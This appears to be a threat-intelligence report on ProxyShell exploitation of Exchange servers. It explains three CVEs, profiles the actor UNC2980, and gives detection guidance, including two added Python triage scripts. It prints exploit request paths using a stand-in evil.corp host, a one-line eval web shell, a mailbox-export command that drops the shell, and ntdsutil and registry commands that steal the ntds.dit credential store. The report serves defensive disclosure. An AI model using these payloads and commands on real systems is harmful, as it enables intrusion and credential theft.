PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers

In August 2021, Mandiant Managed Defense identified and responded to
the exploitation of a chain of vulnerabilities known as ProxyShell.
The ProxyShell vulnerabilities consist of three CVEs
(CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the
following versions of on-premises Microsoft Exchange Servers.

  • Exchange Server 2013 (Cumulative Update 23 and below)
  • Exchange Server 2016 (Cumulative Update 20 and below)
  • Exchange Server 2019 (Cumulative Update 9 and below)

The vulnerabilities are being tracked in the following CVEs:

CVE             Risk Rating  Access Vector  Exploitability  Ease of Attack  Mandiant Intel
CVE-2021-34473  High         Network        Functional      Easy            Link
CVE-2021-34523  Low          Local          Functional      Easy            Link
CVE-2021-31207  Medium       Network        Functional      Easy            Link

Table 1: List of May & July 2021 Microsoft Exchange CVEs and FireEye Intel Summaries

Overview

Microsoft Exchange Server provides email and supporting services for
organizations. This solution is used globally, both on-premises and in
the cloud. This chain of vulnerabilities exists in unpatched
on-premises editions of Microsoft Exchange Server only and is being
actively exploited on those servers accessible on the Internet.

Mandiant responded to multiple intrusions impacting a wide variety
of industries including Education, Government, Business Services, and
Telecommunications. These organizations are based in the United
States, Europe, and the Middle East. However, targeting is almost
certainly broader than directly observed.

One specific targeted attack observed by Mandiant, detailed in this
post, was against a US-based university where UNC2980 exploited
ProxyShell vulnerabilities to gain access to the environment.

The Exploit Chain Explained

ProxyShell refers to a chain of attacks that exploit three different
vulnerabilities affecting on-premises Microsoft Exchange servers to
achieve pre-authenticated remote code execution (RCE). The
exploitation chain was discovered and published
by Orange Tsai (@orange_8361) from the DEVCORE Research Team.

Delivering the Payload

In order to later create a web shell on a Microsoft Exchange server
by exporting from a mailbox, an attacker first needs to create an
email item within a mailbox. In the Metasploit implementation of the
attack, the Autodiscover service is abused to leak a known user’s
distinguished name (DN), which is an address format used internally
within Microsoft Exchange. The Messaging Application Programming
Interface (MAPI) is then leveraged to leak the user’s security
identifier (SID) by passing the previously leaked DN in a request.
The SID is then used to forge an access token to communicate with
Exchange Web Services (EWS).

With the attacker able to successfully impersonate the target user
with a valid access token, they can perform EWS operations. To
continue with the ProxyShell attack, the ‘CreateItem’ operation is
used, which allows the remote creation of email messages in the
impersonated user’s mailbox. While responding, Mandiant has seen draft
emails with attached web shells, encoded in such a way that they
become decoded upon export to PST later in the attack (specifically
through the PST format’s permutative encoding).

Emails may also be placed in targeted users’ mailboxes via SMTP, as
was suggested in Orange Tsai’s documentation of the attack.

CVE-2021-34473 — Pre-auth Path Confusion Leads to ACL Bypass

Microsoft Exchange has a feature called ‘Explicit Logon’, which
legitimately allows users to open another user’s mailbox or calendar
in a new browser window by providing the mailbox address in the URL.
The feature was designed to only provide access where ‘Full Access’ is
granted to the user, and the target mailbox or calendar is configured
to publish. Exchange is designed to normalize the specified mailbox
address in the URL to identify the target.

The vulnerability lies in passing the string
Autodiscover/Autodiscover.json in the Email field of the URL. When
that string is supplied, Exchange does not perform sufficient checks
on the address, and its normalization process then grants arbitrary
access to backend URLs as NT AUTHORITY\SYSTEM.

GET /autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp

GET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp

POST /autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp

POST /autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp

Figure 1: Requests showing how an attacker can abuse the normalization process of the Explicit Logon feature

CVE-2021-34523 — Elevation of Privilege on Exchange PowerShell Backend

The Exchange PowerShell Remoting feature, natively built into
Microsoft Exchange, was designed to assist with administrative
activities via the command line. The previous exploit allowed an
attacker to interface with arbitrary backend URLs as NT
AUTHORITY\SYSTEM; however, since that user does not have a mailbox, the
attacker cannot directly interface with the PowerShell backend
(/Powershell) at that privilege level.

The PowerShell backend checks for the X-CommonAccessToken header in
incoming requests. If the header does not exist, another method is
used to get a CommonAccessToken. This method checks for the X-Rps-CAT
parameter in the incoming request, and if present, deserializes this
to a valid CommonAccessToken. With the previously collected
information on the target mailbox or default information from built-in
mailboxes, passing of a valid X-Rps-CAT value is trivial.

By passing this value to the PowerShell backend along with the
previously obtained access token, an attacker can downgrade from the NT
AUTHORITY\SYSTEM account to the target user. This user must have local
administrative privileges in order to execute arbitrary Exchange
PowerShell commands.

POST /autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64 encoded data]

Figure 2: This request uses the parameter X-Rps-CAT, which allows valid user impersonation

CVE-2021-31207 — Post-auth Arbitrary-File-Write Leads to RCE

Once the two previous vulnerabilities are exploited successfully,
CVE-2021-31207 allows the attacker to write files. As soon as the
attacker is able to execute arbitrary PowerShell commands, and the
required ‘Import Export Mailbox’ role is assigned to the impersonated
user (which can be achieved by executing the
New-ManagementRoleAssignment cmdlet), the cmdlet
New-MailboxExportRequest can be used to export a user’s mailbox to a
specific desired path, e.g.

New-MailboxExportRequest -Mailbox john.doe@enterprise.corp -FilePath \\127.0.0.1\C$\path\to\webshell.aspx

Figure 3: New-MailboxExportRequest can be used to export payloads

The use of New-MailboxExportRequest allows the attacker to export
the target mailboxes in which the emails with encoded web shells were
previously created. The attacker can export the mailbox to the PST
file format with a web file extension, such as ASPX, which allows the
attacker to drop a functional web shell, since the encoded attachments
in the email are decoded upon write to the PST file format. This is
due to the PST file format using permutative encoding: by attaching a
pre-encoded payload, the attacker ensures that the decoded payload is
what is actually written upon export.

Observations From Investigations

Mandiant responded to intrusions involving ProxyShell exploitation
across a range of customers and industries. Proof-of-concept (PoC)
exploits developed and released publicly by security researchers can
be leveraged by any threat group, leading to adoption by groups with
varying levels of sophistication. Mandiant has observed the exploit
chain resulting in post-exploitation activities, including the
deployment of web shells, backdoors, and tunneling utilities to
further compromise victim organizations. As of the release of this
blog post, Mandiant tracks eight UNC groups exploiting the ProxyShell
vulnerabilities. Mandiant anticipates more clusters will be formed as
different threat actors adopt working exploits.

Exploitation

Mandiant has observed the exploitation of ProxyShell starting with
the abuse of Autodiscover services to leak a known user’s distinguished
name (DN), which is then leveraged to leak the administrator’s security
identifier (SID).

By using the leaked DN and SID, the
attacker can create a mailbox that contains a draft email with a
malicious payload as an attachment. Afterwards, the mailbox and the
contained payload are exported to a web-accessible directory or
another directory on the host.

Attempted exploitation of ProxyShell appears to be mostly automated.
In some cases, Mandiant observed only partial attacker success, such
as the creation of items in mailboxes remotely, but not the exporting
of mailboxes and their contained payloads to another directory on the host.

Mandiant has observed a wide range of source IP addresses and user
agents attempting HTTP requests consistent with the first stage of the
ProxyShell exploit chain.

Post-Exploitation

Upon successful exploitation of the vulnerabilities, Mandiant
observed multiple payloads to gain a foothold in the network including
CHINACHOP and BLUEBEAM web shells (see Malware Definitions section).
Follow-on actions include execution of internal reconnaissance
commands on servers, and deployment of tunneler utilities.


Figure 4: BLUEBEAM ASP web shell that was
embedded into a PST payload

Threat Actor Spotlight: UNC2980

In August 2021, Mandiant Managed Defense responded to an intrusion
leveraging the ProxyShell vulnerability at a US-based university.
Mandiant tracks this threat actor as UNC2980.

UNC2980 is a cluster of threat activity tracked since August 2021
and believed to be conducting cyber espionage operations. Mandiant
suspects, currently with low confidence, that this group is operating
from China. UNC2980 has been observed exploiting CVE-2021-34473,
CVE-2021-34523, and CVE-2021-31207, publicly referred to as
“ProxyShell”, to upload web shells for initial access. Post
compromise, the group relies on multiple publicly available tools
including EARTHWORM, HTRAN, MIMIKATZ, and WMIEXEC.

UNC2980 in Action

Upon gaining access through the exploitation of ProxyShell and
deploying a web shell, UNC2980 dropped multiple tools into the victim
environment. The following publicly available tools were observed on
the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.

<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>

Figure 5: Web shell embedded in PST payload used by UNC2980

Approximately 11 hours and 44 minutes after the ProxyShell
exploitation, Mandiant observed post-exploitation activity beginning
with multiple Event ID 4648 (A logon was attempted using explicit
credentials) events initiated by the process C:\root\mimikatz.exe on
the initial compromised host. All Event ID 4648 events were associated
with two different domain controllers within the environment.

The group then utilized the utility WMIEXEC to conduct
post-exploitation activity. This was primarily observed through the
default redirection of command output used by WMIEXEC.

cmd.exe /c whoami > C:\wmi.dll 2>&1

cmd.exe /c quser > C:\wmi.dll 2>&1

cmd.exe /c net localgroup administrators > C:\wmi.dll 2>&1

Figure 6: Reconnaissance commands executed via WMIEXEC

UNC2980 was observed utilizing several techniques for credential
theft once access to a host was established. In one instance, after
performing reconnaissance, UNC2980 deployed multiple variants of
MIMIKATZ. In another instance, UNC2980 utilized multiple batch files
which executed ntdsutil to enumerate snapshots of volumes and were
then used to copy ntds.dit and the System hive.

ntdsutil snapshot "List All" quit quit >> c:\temp\1.txt

ntdsutil snapshot "unmount {[GUID]}" quit quit

net localgroup administrators

ntdsutil snapshot "activate instance ntds" create quit quit

ntdsutil snapshot "delete {[GUID]}" quit quit

ntdsutil snapshot "mount {[GUID]}" quit quit

copy c:\$SNAP_[date]_VOLUMEC$\windows\ntds\ntds.dit c:\temp\ntds.dit

reg save hklm\system c:\temp\s.hive

Figure 7: Executed batch commands

Monitoring and Investigating

Mandiant recommends monitoring or investigating for compromise on
presently or previously vulnerable Exchange servers.

Remote Creation of Items in Mailboxes
  • Monitor or investigate irregular Exchange EWS logs to identify
    CreateItem requests, indicating the remote creation of items.

    • Mandiant has observed draft emails created, containing
      attached encoded web shells, though other items may also be
      created.
    • Examine logs under ‘Program Files\Microsoft\Exchange
      Server\V15\Logging\Ews\*’ where:

      • AuthenticatedUser is SYSTEM or a system account
      • SoapAction is CreateItem
      • HttpStatus is 200
        (indicating success)
  • Monitor or identify draft emails with encoded attachments.
    • Mandiant has observed draft emails containing .TXT file
      attachments with encoded content.

Remote Unauthenticated PowerShell
  • Monitor IIS logs for successful POST requests containing
    “/autodiscover/autodiscover.json” &
    “Powershell”.
  • Monitor or investigate the execution
    of the PowerShell cmdlets ‘New-ManagementRoleAssignment’ or
    ‘New-MailboxExportRequest’.

    • Mandiant has observed
      ‘New-ManagementRoleAssignment’ being used to assign mailbox
      import and export permissions to target mailboxes, followed by
      ‘New-MailboxExportRequest’ to export the drafts folder
      containing emails with encoded web shells attached.
    • Examine PowerShell ScriptBlock, transcription, and module
      logging where enabled.
    • Examine logs under ‘Program Files\Microsoft\Exchange
      Server\V15\Logging\CmdletInfra\Powershell-ProxyCmdlet\*’,
      especially the cmdlet parameters where:

      • AuthenticatedUser is the name of the impersonated mailbox
        user
      • ProcessName contains w3wp
      • Cmdlet is
        ‘New-ManagementRoleAssignment’ or
        ‘New-MailboxExportRequest’
    • Mandiant has observed the ‘CmdletInfra\Powershell-ProxyCmdlet’
      logs recording remote cmdlets and their parameters even when
      regular PowerShell ScriptBlock/transcription/module logging is
      not enabled.
    • Mandiant recommends review of these logs on
      presently or previously vulnerable servers even in cases where
      no web shell is identified, since attackers may execute any
      PowerShell cmdlet, utilizing only part of the exploit
      chain.
  • Examine the ‘Data’ field in the Audit logs stored under ‘Program
    Files\Microsoft\Exchange Server\V15\Logging\LocalQueue\Exchange\*’.
    This field contains JSON data in which the Operation key value
    holds the executed PowerShell cmdlets.
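The two log checks above (EWS CreateItem requests by a system account, and the role-assignment/export cmdlets in the CmdletInfra logs) as an added Python triage script; this is not code from the original post, and the CSV column sets below are constructed and reduced for the example, so map the column names to the headers of your own Exchange logs.

```python
import csv
import io
import re

# Constructed, reduced CSV excerpts in the spirit of the Exchange Ews and
# CmdletInfra\Powershell-ProxyCmdlet logs (sample data; real files carry many more columns).
SAMPLE_EWS_LOG = """\
DateTime,AuthenticatedUser,SoapAction,HttpStatus,UserAgent
2021-08-12T03:20:01Z,NT AUTHORITY\\SYSTEM,CreateItem,200,python-requests/2.26.0
2021-08-12T03:20:05Z,CONTOSO\\alice,CreateItem,200,Outlook/16.0
2021-08-12T03:20:09Z,NT AUTHORITY\\SYSTEM,GetFolder,200,python-requests/2.26.0
2021-08-12T03:21:00Z,NT AUTHORITY\\SYSTEM,CreateItem,500,python-requests/2.26.0
"""

SAMPLE_CMDLET_LOG = """\
DateTime,AuthenticatedUser,ProcessName,Cmdlet,CmdletParameters
2021-08-12T03:25:00Z,CONTOSO\\administrator,w3wp,New-ManagementRoleAssignment,-Role "Mailbox Import Export" -User administrator
2021-08-12T03:25:30Z,CONTOSO\\administrator,w3wp,New-MailboxExportRequest,-Mailbox john.doe -FilePath \\\\127.0.0.1\\C$\\inetpub\\wwwroot\\aspnet_client\\shell.aspx
2021-08-12T09:00:00Z,CONTOSO\\administrator,powershell,Get-Mailbox,-Identity john.doe
"""

SUSPECT_CMDLETS = {"new-managementroleassignment", "new-mailboxexportrequest"}
WEB_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")  # assumption: extensions IIS would execute


def find_remote_createitem(ews_csv):
    """EWS rows where a system account created an item and the server answered HTTP 200."""
    hits = []
    for row in csv.DictReader(io.StringIO(ews_csv)):
        user = row["AuthenticatedUser"].upper()
        is_system = user == "SYSTEM" or user.endswith("\\SYSTEM")
        if is_system and row["SoapAction"] == "CreateItem" and row["HttpStatus"] == "200":
            hits.append((row["DateTime"], row["UserAgent"]))
    return hits


def find_suspect_cmdlets(cmdlet_csv):
    """Role-assignment / export cmdlets proxied through w3wp; an export to a web extension is escalated."""
    hits = []
    for row in csv.DictReader(io.StringIO(cmdlet_csv)):
        cmdlet = row["Cmdlet"].lower()
        if "w3wp" not in row["ProcessName"].lower() or cmdlet not in SUSPECT_CMDLETS:
            continue
        severity = "review"
        m = re.search(r'-FilePath\s+"?([^\s"]+)', row["CmdletParameters"], re.IGNORECASE)
        if m and m.group(1).lower().endswith(WEB_EXTENSIONS):
            severity = "web-shell-export"  # mailbox exported straight to an executable web file
        hits.append((row["DateTime"], row["AuthenticatedUser"], row["Cmdlet"], severity))
    return hits


if __name__ == "__main__":
    for hit in find_remote_createitem(SAMPLE_EWS_LOG):
        print("EWS CreateItem by system account:", hit)
    for hit in find_suspect_cmdlets(SAMPLE_CMDLET_LOG):
        print("Suspect cmdlet via w3wp:", hit)
```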

Creation or Use of Web Shells

  • Monitor or identify .ASPX files created under the path
    inetpub\wwwroot\aspnet_client written by SYSTEM.
  • Monitor or
    identify PST files (by header ‘!BDN’ / 0x2142444E) with web file
    extensions (commonly .ASPX). These files may be written by
    MSMailboxReplication.exe or w3wp.exe (the latter can be the result
    of replication events due to the exploitation of a different
    Exchange server in the same cluster).
  • Monitor or identify
    files created by MSMailboxReplication.exe with extensions other than
    .PST (this binary is used by the New-MailboxExportRequest PowerShell
    cmdlet).
  • Monitor or identify arbitrary commands spawned by
    the process w3wp.exe.
  • Monitor or investigate the
    ‘MSExchange Management’ Event logs (EID: 1 and EID: 6) to identify
    ‘New-MailboxExportRequest’ requests with .ASPX extensions,
    indicative of a web shell creation attempt.
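The PST-with-web-extension check from the list above, as an added Python example that is not part of the original post: it walks a web root and flags files whose first four bytes are the PST magic ‘!BDN’ but whose extension IIS would execute. The sample web root is constructed in a temporary directory, and the set of web extensions beyond .aspx is an assumption.

```python
import os
import tempfile

PST_MAGIC = b"!BDN"  # 0x2142444E, the PST header noted in the report
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}  # assumption: extensions IIS would execute


def is_pst_with_web_extension(path):
    """True if the file carries a web-executable extension but starts with the PST magic."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in WEB_EXTENSIONS:
        return False
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == PST_MAGIC
    except OSError:
        return False


def scan_webroot(root):
    """Walk a web root and return the paths of PST files masquerading as web pages."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_pst_with_web_extension(path):
                hits.append(path)
    return sorted(hits)


def build_sample_webroot():
    """Construct a throwaway directory mimicking inetpub\\wwwroot\\aspnet_client (sample data only)."""
    root = tempfile.mkdtemp(prefix="proxyshell-demo-")
    client = os.path.join(root, "aspnet_client")
    os.makedirs(client)
    samples = {
        "dropped.aspx": PST_MAGIC + b"\x00" * 60,      # PST header with a web extension: suspicious
        "legit.aspx": b'<%@ Page Language="C#" %>',   # ordinary ASP.NET page
        "export.pst": PST_MAGIC + b"\x00" * 60,       # PST with its normal extension
    }
    for name, data in samples.items():
        with open(os.path.join(client, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_sample_webroot()):
        print("PST content with web extension:", hit)
```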

Additional attempted or successful exploitation may be identified by
analyzing network and IIS logs looking for HTTP requests matching some
of the patterns described in this report.

  • Requests against /autodiscover/autodiscover.json containing
    ‘powershell’, ‘mapi/nspi’, ‘mapi/emsmdb’, ‘/EWS’ or
    ‘X-Rps-CAT’.
  • Status codes 200, 301, or 302 indicating
    successful exploitation.
  • Status codes 400, 401, or 404
    indicating attempted exploitation.

Prevention and Remediation

Mandiant advises all organizations to apply patches KB5003435
(CVE-2021-31207) and KB5001779
(CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises
Microsoft Exchange servers to mitigate these vulnerabilities being
exploited. To verify the current version of on-premises Microsoft
Exchange running within an organization, reference this Microsoft resource.

If an organization is not able to immediately apply the patches,
inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers
should be explicitly blocked from the Internet.

Additionally, Mandiant recommends organizations review their
detection and response capabilities, especially on public-facing
infrastructure, including:

  • Deploying and configuring a File Integrity Monitoring solution
    to monitor and/or prevent the creation of files, especially on web
    servers outside of maintenance windows
  • Deploying,
    configuring, and monitoring an Endpoint Detection and Response
    solution to alert to and respond to malicious activity
    effectively
  • Enabling enhanced logging and implementing
    sufficient log retention periods to support investigations,
    including:

    • Microsoft Systems Monitor (Sysmon) on Windows
      Servers
    • PowerShell Module, Script Block, and
      Transcription Logging

Detecting the Techniques

FireEye Endpoint Security
  • PST FILEWRITE WITH ASP EXTENSION (METHODOLOGY)
  • W3WP.EXE CHILD PROCESS RECON COMMAND (METHODOLOGY)
  • WMICEXEC (FAMILY)

FireEye Network Security
  • Exploit.PY.ProxyShell
  • Microsoft Exchange CVE-2021-34473 Remote Code Execution
  • FE_Microsoft Exchange CVE-2021-34473 Remote Code Execution

FireEye Email Security, FireEye Detection On Demand, FireEye Malware
File Scanning, FireEye Malware File Storage Scanning
  • FEC_Exploit_PY_ProxyShell
  • FE_Hunting_PSTWithEmbeddedWebShell
  • FE_Exploit_PY_ProxyShell

FireEye Helix
  • MICROSOFT EXCHANGE [ProxyShell Exploit Attempt]
  • MICROSOFT EXCHANGE [ProxyShell Exploit Success]
  • MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) – Mailbox Export]
  • MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) – Certificate Request Export]
Mandiant Security Validation Action

Organizations can validate their security controls using the
following actions with Mandiant Security Validation.

VID       Name
A101-827  Application Vulnerability – CVE-2021-34473, ProxyShell Vulnerability Check
A101-829  Application Vulnerability – ProxyShell, Exploitation
A101-839  Malicious File Transfer – ProxyShell WebShell, Download

Malware Definitions

BLUEBEAM

BLUEBEAM (aka Godzilla) is a publicly available web shell
management tool written in Java. BLUEBEAM can generate web shell
payloads in JSP, ASP.NET, and PHP, and it also supports AES encryption.

BLUEBEAM contains 20 built-in modules that provide features such as
loading additional web shells into memory, shell execution, mimikatz,
meterpreter, file compression, and privilege escalation.

HTRAN

HTRAN is a publicly available tunneler written in C/C++ that serves
as a proxy between two endpoints specified via command line arguments.

EARTHWORM

EARTHWORM is a publicly available tunneler utility. It is capable of
establishing a tunnel to a SOCKS v5 server and is supported on the
following operating systems: Linux, MacOS, and Arm-Linux.

CHINACHOP

The CHOPPER web shell is a simple code injection web shell that is
capable of executing Microsoft .NET code within HTTP POST commands.
This allows the shell to upload and download files, execute
applications with webserver account permissions, list directory
contents, access Active Directory, access databases, and any other
action allowed by the .NET runtime.

For more detailed analysis, see our blog post on the China Chopper
web shell.

Acknowledgements

Alex Pennino, Andrew Rector, Harris Ansari and Yash Gupta
